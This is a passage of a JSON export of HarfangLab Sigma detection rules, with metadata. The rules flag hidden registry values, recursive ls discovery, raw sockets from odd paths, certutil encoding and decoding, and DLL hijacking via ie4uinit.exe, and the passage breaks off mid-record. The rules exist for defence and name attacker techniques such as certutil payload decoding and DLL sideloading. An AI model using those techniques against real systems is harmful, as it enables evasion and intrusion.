+ "content": "title: Possible Hidden Registry Data Created\nid: 01833e69-127a-4ff4-a998-d4decbae548f\ndescription: |\n Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\n Adversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\n It is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\nreferences:\n - https://attack.mitre.org/techniques/T1112/\ndate: 2021/10/08\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n Details|startswith: ' '\n\n # Some softwares set values containing only a random number of spaces\n exclusion_all_spaces:\n Details|startswith: ' '\n Details|endswith: ' '\n\n exclusion_image:\n Image:\n - '?:\\Program Files (x86)\\Avid\\iNEWS*\\ANWS.exe'\n - '?:\\Windows\\System32\\drivers\\Intel\\ICPS\\IntelConnect.exe'\n - '?:\\Program Files\\Photon Engineering\\FRED *\\Bin\\Fred.exe'\n - '?:\\Program Files (x86)\\Thermo\\Avantage\\Bin\\Avantage.exe'\n - '?:\\program files\\thermo scientific\\avantage\\bin\\avantage.exe'\n\n exclusion_commandline:\n Image: '?:\\windows\\system32\\regsvr32.exe'\n ProcessCommandLine:\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\xraygun_??????.ocx'\n - '/s ?:\\program files\\thermo scientific\\avantage\\bin\\vgchargecompensation.ocx'\n\n exclusion_tiworker:\n Image|endswith: '\\TiWorker.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n exclusion_windowsupdatebox:\n ProcessParentImage|endswith:\n - '\\WindowsUpdateBox.exe'\n - ':\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n - '\\TiWorker.exe'\n - '\\Sources\\SetupPrep.exe'\n TargetObject|endswith: '\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n Details|contains|all:\n - 'PlugInConfiguration'\n - 'PublicKeyToken'\n - 'MaxConcurrentCommandsPerShell'\n\n exclusion_adobe:\n Image|endswith:\n - '\\AcroRd32.exe'\n - '\\Acrobat.exe'\n ProcessSigned: 'true'\n ProcessSignature:\n - 'Adobe Inc.'\n - 'Adobe Systems, Incorporated'\n TargetObject|endswith:\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsPrev\\cWin0\\cTab*\\tfilename'\n # - '\\Software\\Adobe\\Acrobat Reader\\DC\\SessionManagement\\cWindowsCurrent\\cWin0\\cTab*\\tfilename'\n # - '\\SOFTWARE\\Adobe\\Acrobat Reader\\2017\\AVGeneral\\cRecentFiles\\c8\\tFileName'\n - '\\SOFTWARE\\Adobe\\Acrobat Reader\\\\*\\tfilename'\n - '\\SOFTWARE\\Adobe\\Adobe Acrobat\\\\*\\tfilename'\n\n exclusion_jalios:\n Image: '?:\\Program Files (x86)\\Jalios\\Jalios JDrive\\srm.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'JALIOS'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_setuphost:\n Image: '?:\\$WINDOWS.~BT\\Sources\\setuphost.exe'\n TargetObject:\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Shell Extensions\\Approved\\{????????-????-????-????-????????????}'\n - 'HKLM\\$OFFLINE_RW_????????$SOFTWARE\\Classes\\CLSID\\{????????-????-????-????-????????????}\\(Default)'\n Details|contains:\n - '__AChangedOverlay'\n - '__ASynchronizedOverlay'\n - '__APrivateOverlay'\n - '__ATBUOverlay'\n - '__ALockedOverlay'\n\n exclusion_wsman:\n Image: '?:\\Windows\\System32\\WSManHTTPConfig.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN\\Migration\\Plugin\\Microsoft.Windows.ServerManagerWorkflows\\ConfigXML'\n\n exclusion_sap:\n Image:\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPgui\\saplogon.exe'\n - '?:\\Program Files (x86)\\SAP\\FrontEnd\\SAPGUI\\saplgpad.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'SAP SE'\n\n exclusion_pdf_architect:\n Image: '?:\\Program Files\\PDF Architect ?\\architect.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'pdfforge GmbH'\n\n exclusion_smbios2reg:\n Image|endswith: '\\BeetleInfo\\Smbios2Reg.exe'\n ProcessOriginalFileName: 'Smbios2Reg.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Wincor Nixdorf\\BeetleInfo SensorService\\DMI\\Mainboard'\n\n exclusion_notepad:\n Image:\n - '?:\\Windows\\System32\\notepad.exe'\n - '?:\\Windows\\SysWOW64\\notepad.exe'\n TargetObject|endswith: '\\SOFTWARE\\Microsoft\\Notepad\\\\*String'\n\n exclusion_ssms:\n Image: '?:\\Program Files (x86)\\Microsoft SQL Server Management Studio *\\Common7\\IDE\\Ssms.exe'\n TargetObject|endswith:\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find'\n - '\\SOFTWARE\\Microsoft\\SQL Server Management Studio\\\\*_IsoShell\\Find\\Find *'\n\n exclusion_softerra:\n Image|endswith: '\\ldapbrowser.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Softerra, Ltd.'\n TargetObject|endswith: '\\SOFTWARE\\Softerra\\LDAP Browser *\\Settings\\QuickSearchBar\\\\*'\n\n exclusion_acdsystems:\n Image|endswith: '\\ACDSee??.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'ACD Systems International Inc'\n TargetObject|endswith: '\\SOFTWARE\\ACD Systems\\ACDSee\\\\*\\PrintOptions\\Presets\\PrintContactSheet\\Default\\strFtrText'\n\n exclusion_outlook:\n ProcessOriginalFileName: 'Outlook.exe'\n TargetObject:\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\Reply-Forward Signature'\n - 'HKU\\S-*\\SOFTWARE\\Microsoft\\Office\\\\*\\Outlook\\Profiles\\Outlook\\\\*\\New Signature'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\n#level: medium\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "01833e69-127a-4ff4-a998-d4decbae548f",
+ "rule_name": "Possible Hidden Registry Data Created",
+ "rule_description": "Detects an attempt to hide data in the Registry by adding multiple spaces at the beginning of a value.\nAdversaries often manipulate the Windows Registry by adding spaces to obscure data, hide configurations, or remove evidence.\nIt is recommended to investigate the source of the registry modification, and check for related events that may indicate unauthorized access or malicious activity.\n",
+ "rule_creation_date": "2021-10-08",
+ "rule_modified_date": "2025-04-15",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1112"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "low",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.613285Z",
+ "creation_date": "2026-03-23T11:45:34.613289Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.613296Z",
+ "rule_level": "low",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://attack.mitre.org/techniques/T1083/",
+ "https://attack.mitre.org/techniques/T1005/"
+ ],
+ "name": "t1083_recursive_ls_linux.yml",
+ "content": "title: File and Directory Discovered via ls\nid: 01ce3d93-1705-4c9f-a0f9-4c0e16af130b\ndescription: |\n Detects the execution of ls with special arguments that may be used for file and directory discovery.\n Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\n It is recommended to investigate the parent process for suspicious activities.\nreferences:\n - https://attack.mitre.org/techniques/T1083/\n - https://attack.mitre.org/techniques/T1005/\ndate: 2022/12/01\nmodified: 2025/01/28\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1083\n - attack.t1005\n - classification.Linux.Source.ProcessCreation\n - classification.Linux.Behavior.Discovery\nlogsource:\n category: process_creation\n product: linux\ndetection:\n selection:\n Image|endswith: '/ls'\n\n # When the agent is under a lot of pressure, the parent information of a process can be missing.\n # Exceptionnaly for this rule, because it triggers so frequently with a low severity, we will ignore\n # its instances where the parent is missing.\n # When the parent is missing, the ParentImage or ParentCommandLine field is also missing (it is not empty or null)\n # so we can't easily match against that.\n # Instead, we reverse the problem by requiring the ParentImage fields to contain a `\\`.\n ParentImage|contains: '\\'\n\n selection_recursive:\n CommandLine|contains:\n - ' -R'\n - ' -?R'\n - ' -??R'\n - ' -???R'\n - ' -????R'\n - ' -?????R'\n\n selection_arg_all:\n CommandLine|contains:\n - ' -a'\n - ' -?a'\n - ' -??a'\n - ' -???a'\n - ' -????a'\n - ' -?????a'\n selection_arg_l:\n CommandLine|contains:\n - ' -l'\n - ' -?l'\n - ' -??l'\n - ' -???l'\n - ' -????l'\n - ' -?????l'\n\n exclusion_commandline:\n CommandLine:\n - '* --color=auto *'\n - 'ls --color=auto'\n - '* --color=tty *'\n - 'ls --color=tty'\n - 'ls --color -d .'\n - 'ls -? /proc/*'\n - 'ls -?? /proc/*'\n - 'ls -? /usr/*'\n - 'ls -? /var/*'\n - 'ls -?? /var/*'\n - 'ls -?? /run/*'\n - '/bin/ls -? /proc/*'\n - '/bin/ls -?? /proc/*'\n - '/bin/ls -? /usr/*'\n - '/bin/ls -? /var/*'\n - '/bin/ls -?? /var/*'\n - '/bin/ls -ld /run/*'\n - 'ls -l libreoffice'\n - '/bin/ls -l ./jre/bin/java'\n\n exclusion_qualys1:\n - GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n - CommandLine:\n - '*/qualys/cloud-agent/*'\n - 'ls -ltr /var/log/qualys/*'\n exclusion_qualys2:\n CommandLine: 'ls -ld /root'\n ParentImage: '/usr/bin/bash'\n GrandparentImage: '/usr/bin/bash'\n exclusion_qualys3:\n GrandparentImage: '/usr/local/qualys/cloud-agent/bin/qualys-scan-util'\n CommandLine|startswith: 'ls -ld /root/'\n\n exclusion_bladelogic:\n ParentImage: '/opt/bmc/bladelogic/RSCD/bin/rscd_full'\n\n exclusion_ransomguard:\n CommandLine: 'ls -ld /root/.ransomguard.???'\n\n condition: selection and selection_recursive and 1 of selection_arg_* and not 1 of exclusion_*\nlevel: low\nconfidence: moderate",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "01ce3d93-1705-4c9f-a0f9-4c0e16af130b",
+ "rule_name": "File and Directory Discovered via ls",
+ "rule_description": "Detects the execution of ls with special arguments that may be used for file and directory discovery.\nAdversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.\nIt is recommended to investigate the parent process for suspicious activities.\n",
+ "rule_creation_date": "2022-12-01",
+ "rule_modified_date": "2025-01-28",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.discovery"
+ ],
+ "rule_technique_tags": [
+ "attack.t1005",
+ "attack.t1083"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "01cf0e26-1674-4236-aa42-024891c8915c",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.085708Z",
+ "creation_date": "2026-03-23T11:45:34.085710Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.085714Z",
+ "rule_level": "high",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/",
+ "https://man7.org/linux/man-pages/man7/raw.7.html",
+ "https://man7.org/linux/man-pages/man7/packet.7.html",
+ "https://attack.mitre.org/techniques/T1095/",
+ "https://attack.mitre.org/techniques/T1040/"
+ ],
+ "name": "t1095_rawsocket_suspicious_path.yml",
+ "content": "title: Raw Socket Created From Suspicious Path\nid: 01cf0e26-1674-4236-aa42-024891c8915c\ndescription: |\n Detects the creation of a raw socket from a suspicious path.\n Raw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\n It may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\n It is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\nreferences:\n - https://sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/\n - https://man7.org/linux/man-pages/man7/raw.7.html\n - https://man7.org/linux/man-pages/man7/packet.7.html\n - https://attack.mitre.org/techniques/T1095/\n - https://attack.mitre.org/techniques/T1040/\ndate: 2024/02/02\nmodified: 2026/02/25\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1095\n - attack.defense_evasion\n - attack.persistence\n - attack.t1205.001\n - attack.t1572\n - attack.credential_access\n - attack.discovery\n - attack.t1040\n - classification.Linux.Source.NetworkActivity\n - classification.Linux.Behavior.NetworkActivity\n - classification.Linux.Behavior.CommandAndControl\nlogsource:\n category: network_rawsocket\n product: linux\ndetection:\n\n selection:\n # Ensure that events without a process do not trigger this rule.\n # This happens typically when the agent is overloaded.\n ProcessImage|startswith:\n - '/'\n - 'memfd:'\n ProcessAncestors|contains: '?'\n\n # Filter common \"good\" directories to only retain the suspicious ones (/home, /tmp, /run, etc.)\n filter_system_directories:\n ProcessImage|startswith:\n - '/bin/'\n - '/sbin/'\n - '/usr/bin/'\n - '/usr/sbin/'\n - '/usr/local/'\n - '/opt/'\n - '/lib/'\n - '/lib64/'\n - '/usr/lib/'\n - '/usr/lib64/'\n - '/usr/libexec/'\n - '/usr/share/'\n - '/snap/'\n - '/var/lib/snapd/snap/'\n - '/nix/store/*/bin/'\n - '/nix/store/*/libexec/'\n\n exclusion_k3s:\n ProcessImage|startswith: '/var/lib/rancher/k3s/data/*/bin/'\n\n exclusion_container:\n - ProcessParentImage:\n - '/usr/bin/containerd-shim-runc-v2'\n - '/opt/containerd/bin/containerd-shim-runc-v2'\n - '/usr/local/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd-shim-runc-v2|'\n - '|/opt/containerd/bin/containerd-shim-runc-v2|'\n - '|/usr/local/bin/containerd-shim-runc-v2|'\n\n exclusion_u01:\n ProcessImage:\n - '/u01/app/*/bin/cping'\n - '/u01/app/*/bin/acquisition'\n - '/u01/app/*/bin/gyrophare'\n - '/u01/app/*/bin/orarootagent.bin'\n\n exclusion_tina:\n ProcessImage:\n - '*/tina/Bin/.tina_ping.real'\n - '/usr/Atempo/tina/Bin/*'\n - '/usr/Atempo/TimeNavigator/*'\n\n exclusion_devolonetsv:\n # /var/lib/devolonetsvc/updates/firmware/devolo-firmware-qca7420/avupdate\n ProcessImage: '/var/lib/devolonetsvc/updates/firmware/devolo-firmware-*/avupdate'\n\n exclusion_openprocess:\n ProcessImage: '/usr/openprocess/*/bin/ops?server'\n\n exclusion_hlab:\n ProcessImage|endswith: '/hl-ebpf-sweeper'\n\n exclusion_lacework_datacollector:\n # /var/lib/lacework/6.11.0.21858/datacollector\n # /var/lib/lacework/6.7.6.19823/datacollector\n ProcessImage: '/var/lib/lacework/*/datacollector'\n\n exclusion_azure_networkwatcher:\n # /var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-1.4.3320.1/amd64/NetworkWatcherAgent\n ProcessImage: '/var/lib/waagent/Microsoft.Azure.NetworkWatcher.NetworkWatcherAgentLinux-*/*/NetworkWatcherAgent'\n\n exclusion_ibm_hsm:\n ProcessImage:\n - '/usr/lpp/mmfs/bin/mmcmi'\n - '/usr/lpp/mmfs/bin/mmfsd'\n - '/usr/lpp/mmfs/libexec/ctdb/ctdb_killtcp'\n\n exclusion_veritas:\n ProcessImage:\n - '/usr/openv/volmgr/bin/avrd'\n - '/usr/openv/volmgr/bin/tldd'\n\n exclusion_nexpose_vulnscanner:\n ProcessCurrentDirectory: '/data/rapid7/nexpose/nsc/'\n\n exclusion_container_iptables:\n ProcessAncestors|contains: '/usr/bin/containerd'\n ProcessCommandLine:\n - '/system/bin/ip6tables-restore --noflush -w -v'\n - '/system/bin/iptables-restore --noflush -w -v'\n\n exclusion_uv_python:\n ProcessImage|contains: '/.local/share/uv/python/'\n\n exclusion_cortex:\n ProcessCommandLine: '/opt/traps/bin/pmd'\n\n exclusion_sensugo:\n ProcessAncestors|contains:\n - '|/opt/sensugo/bin/sensu-agent.v*|'\n - '|/opt/sensugo/bin/sensu-backend.v*|'\n\n exclusion_zygote:\n ProcessParentImage: '/system/bin/app_process64'\n\n exclusion_icsscand:\n ProcessImage|endswith: '/icsscand/build/libicsneo-socketcan-daemon'\n\n exclusion_iptables:\n ProcessImage: '/system/bin/iptables'\n\n exclusion_zig_benchmark:\n ProcessCommandLine: 'zig-out/bin/benchmark'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "01cf0e26-1674-4236-aa42-024891c8915c",
+ "rule_name": "Raw Socket Created From Suspicious Path",
+ "rule_description": "Detects the creation of a raw socket from a suspicious path.\nRaw sockets are a special kind of socket that allow deep manipulation of network packets, either for inspection, filtering, custom protocols or packet forging.\nIt may hint at a malware trying to hide its traffic without having to open a port or using a custom protocol to communicate with its C2.\nIt is recommended to ensure the process who created this raw socket had a legitimate reason to do so and that the host wasn't compromised.\n",
+ "rule_creation_date": "2024-02-02",
+ "rule_modified_date": "2026-02-25",
+ "rule_os": "linux",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.command_and_control",
+ "attack.credential_access",
+ "attack.defense_evasion",
+ "attack.discovery",
+ "attack.persistence"
+ ],
+ "rule_technique_tags": [
+ "attack.t1040",
+ "attack.t1095",
+ "attack.t1205.001",
+ "attack.t1572"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "moderate",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.078393Z",
+ "creation_date": "2026-03-23T11:45:34.078395Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.078400Z",
+ "rule_level": "high",
+ "rule_confidence": "moderate",
+ "rule_confidence_override": null,
+ "references": [
+ "https://lolbas-project.github.io/lolbas/Binaries/Certutil/",
+ "https://attack.mitre.org/techniques/T1140/"
+ ],
+ "name": "t1140_certutil_encoding_usage.yml",
+ "content": "title: Certutil Used for Encoding\nid: 01f3ffc6-8407-4fda-972a-7d8066ec1e3b\ndescription: |\n Detects the execution of certutil.exe to decode or encode data.\n This is often used by attackers to decode binaries hidden inside certificate files as Base64 or Hexadecimal information.\n It is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certutil/\n - https://attack.mitre.org/techniques/T1140/\ndate: 2021/05/27\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.s0160\n - attack.t1140\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Certutil\n - classification.Windows.Behavior.Obfuscation\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\certutil.exe'\n # Renamed binaries\n - OriginalFileName: 'CertUtil.exe'\n\n selection_cmd:\n CommandLine|contains:\n # Decode to BASE64\n - ' -decode '\n - ' /decode '\n\n # Encode to BASE64\n - ' -encode '\n - ' /encode '\n\n # Decode from hexadecimal\n - ' -decodehex '\n - ' /decodehex '\n\n # Encode to hexadecimal\n - ' -encodehex '\n - ' /encodehex '\n\n exclusion_glpi1:\n # GLPI-Agent keystore-export\n CommandLine: 'certutil -encode *.crt temp.cer'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n GrandparentImage|endswith: '\\glpi-agent.exe'\n\n exclusion_glpi2:\n # GLPI-Agent keystore-export\n CommandLine:\n - 'certutil -encode *.crt temp.cer'\n - 'certutil -encode *.crt temp.cer ?'\n # C:\\Program Files\\GLPI-Agent\\perl\\bin\\glpi-agent.exe\n CurrentDirectory: '?:\\Program Files\\GLPI-Agent\\var\\keystore-export-*\\'\n\n exclusion_pfu_scansnap:\n ProcessGrandparentImage:\n - '?:\\Program Files (x86)\\PFU\\ScanSnap\\Home\\SshRegister.exe'\n - '?:\\Program Files (x86)\\PFU\\ScanSnap\\Driver\\PfuSsMon.exe'\n ProcessCommandLine: 'certutil -encodehex -f * content.json 1'\n\n exclusion_centralstage:\n ProcessGrandparentImage: '?:\\ProgramData\\CentraStage\\AEMAgent\\AEMAgent.exe'\n ProcessCommandLine: 'certutil -decode getsignatureinfo.base64 getsignatureinfo.ps1'\n\n condition: all of selection_* and not 1 of exclusion_*\nlevel: high\nconfidence: moderate",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "01f3ffc6-8407-4fda-972a-7d8066ec1e3b",
+ "rule_name": "Certutil Used for Encoding",
+ "rule_description": "Detects the execution of certutil.exe to decode or encode data.\nThis is often used by attackers to decode binaries hidden inside certificate files as Base64 or Hexadecimal information.\nIt is recommended to check the content of the written file and the activity of the parent process for malicious behavior.\n",
+ "rule_creation_date": "2021-05-27",
+ "rule_modified_date": "2025-02-13",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion"
+ ],
+ "rule_technique_tags": [
+ "attack.t1140"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "022246ff-42f6-4d06-8173-3c88a407926a",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
+ "effective_state": "alert",
+ "rule_effective_level": "high",
+ "rule_effective_confidence": "strong",
+ "alert_count": 0,
+ "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
+ "rule_level_overridden": false,
+ "whitelist_count": 0,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "endpoint_detection": true,
+ "backend_detection": false,
+ "origin_stack": {
+ "id": "b8e2fe4fc90e4d08",
+ "name": null,
+ "is_current": false,
+ "is_supervisor": true,
+ "is_tenant": false
+ },
+ "tenant": "b8e2fe4fc90e4d08",
+ "rule_is_depended_on": [],
+ "rule_type": "sigma_rule",
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:34.592360Z",
+ "creation_date": "2026-03-23T11:45:34.592363Z",
+ "enabled": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:34.592371Z",
+ "rule_level": "high",
+ "rule_confidence": "strong",
+ "rule_confidence_override": null,
+ "references": [
+ "https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
+ "https://github.com/xforcered/WFH",
+ "https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
+ "https://attack.mitre.org/techniques/T1574/001/"
+ ],
+ "name": "t1574_001_dll_hijacking_ie4uinit.yml",
+ "content": "title: DLL Hijacking via ie4uinit.exe\nid: 022246ff-42f6-4d06-8173-3c88a407926a\ndescription: |\n Detects potential Windows DLL Hijacking via ie4uinit.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://github.com/xforcered/WFH\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ie4uinit.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\CRYPTBASE.DLL'\n - '\\IEADVPACK.dll'\n - '\\iedkcs32.dll'\n - '\\MLANG.dll'\n - '\\netapi32.dll'\n - '\\netutils.dll'\n - '\\urlmon.dll'\n - '\\WININET.dll'\n - '\\wkscli.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
+ "block_on_agent": false,
+ "quarantine_on_agent": false,
+ "rule_level_override": null,
+ "rule_id": "022246ff-42f6-4d06-8173-3c88a407926a",
+ "rule_name": "DLL Hijacking via ie4uinit.exe",
+ "rule_description": "Detects potential Windows DLL Hijacking via ie4uinit.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
+ "rule_creation_date": "2021-12-10",
+ "rule_modified_date": "2025-07-11",
+ "rule_os": "windows",
+ "rule_status": null,
+ "rule_tactic_tags": [
+ "attack.defense_evasion",
+ "attack.persistence",
+ "attack.privilege_escalation"
+ ],
+ "rule_technique_tags": [
+ "attack.t1574.001"
+ ],
+ "warnings": null,
+ "errors": null,
+ "declared_in": null,
+ "source": "0950c540-b155-4054-9b93-8fb2888de6ed"
+}
+{
+ "id": "0247bb14-5962-4133-9181-cb2f419787f1",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "alert",
